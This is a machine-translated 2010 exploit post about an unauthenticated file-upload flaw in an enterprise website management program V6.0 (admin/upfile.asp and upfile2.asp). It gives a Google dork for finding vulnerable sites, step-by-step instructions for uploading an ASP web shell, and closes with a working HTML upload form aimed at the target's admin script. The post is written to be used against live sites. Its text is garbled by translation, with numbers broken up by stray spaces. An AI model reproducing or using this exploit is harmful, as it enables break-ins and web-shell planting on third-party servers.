7 1 1 enterprise web site management program V6. 0 Then proof upload vulnerability and exploit-vulnerability warning-the black bar safety net

2010-02-27T00:00:00
ID MYHACK58:62201026257
Type myhack58
Reporter 佚名
Modified 2010-02-27T00:00:00

Description

sfmb ----------------------- The other day a Cookie injection vulnerability, and today they turned to see to

In the ADMIN directory there are 2 Upload File upfile. asp and upfile2. asp

These 2 components of the function is: without logging in the backend, without having to cut packages, direct local modifications to the code will be able to upload asp files, speechless.。。。。

In addition, the more lovely it is to write this program for us to write a set of available universal password directly login to the backend. According to Google reports, the existence of this system the user up to 1,0 5 0,0 0 0 in. Continue speechless.

1, Google write inurl:List. asp? Shop_ID 2, If the site there is the above Upload File, 9 0 per cent of the uploaded asp file. 3, The images 1 2 3 in the address to replace your own testing of the website address. 4, in the Select a picture file in the upload asp file. It can upload any file suffix from. 5, Open the web site home page, looking for pictures of the real address. Generally shell address is http://www. XXX. com/pic/XXXXXX. asp

Wordy sentence, the upload component not have 2? Generally the administrator will modify or delete the first upfile. asp, the second one also can be utilized upfile2. asp

If the test fails. Description this vulnerability has been patched in. If no patch test fails, a reference to a paragraph: in the General case, something that was an individual occurrence has its own unique properties of a negative phenomenon, and this phenomenon cannot be from a scientific point of view to give a reasonable explanation, but it does exist, we generally call it a character issue. (RPWT)” -----------excerpted from the "dictionary" Section 8 7 Page 4

EXP:

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <link href="style. css" rel="stylesheet" type="text/css"> </head> <body leftmargin="0" topmargin="0" bgcolor="#CEDBFF"> <table width="1 0 0%" border="0" cellspacing="0" cellpadding="0" align="center"> <form name="myform" method="post" action="http://www.XXXX.com/admin/upfile.asp" enctype="multipart/form-data" language="javascript" > <tr align="center" valign="middle"> <td height="1 5" align="left"> select a picture: <input type="file" name="file1" value=""> <input type="submit" value="upload" name="B1" class="txt" isshowprocessbar="True"></td> </tr> </form> </table> </body> </html>